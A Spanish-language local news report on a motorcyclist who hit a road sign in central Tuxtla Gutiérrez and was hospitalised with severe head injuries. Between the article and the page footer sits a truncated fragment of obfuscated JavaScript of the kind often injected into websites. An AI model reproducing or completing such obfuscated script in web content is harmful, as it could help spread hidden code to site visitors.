Con el cráneo destrozado terminó motociclista

Jairo Camacho.

Agencia ReporteCiudano, 27 de octubre del 2024. Tuxtla Gutiérrez. – Un motociclista se debate entre la vida y la muerte luego de chocar contra un señalamiento en el centro de Tuxtla Gutiérrez.

Los reportes oficiales informaron que, este hecho ocurrió cuando el motociclista de unos 40 años circulaba sobre la 3a Oriente de Norte a Sur y al llegar a la 1 Norte sufrió la aparatosa caída.

Testigos relataron que, el sujeto chocó su Italika contra un señalamiento y eso ocasionó que saliera volando y se estrellara contra el pavimento.

Por el golpe quedó con el frente de la cabeza destrozado.

Al lugar arribaron paramédicos para atender al lesionado y trasladarlo al hospital Gilberto Gómez Maza para su atención médica especializada.

Una grúa de la Secretaría de Seguridad Pública y Tránsito Municipal se encargó de llevar la moto a un corralón en turno para deslindar responsabilidades.

El sujeto se debate entre la vida y la muerte.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Fuerte choque en la autopista San Cristóbal-Tuxtla deja lesionados y cierre parcial de la circulación

Yolanda Rodríguez/ corresponsal 30 de junio del 2026. SCLC.- Un fuerte accidente de tránsito registrado …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *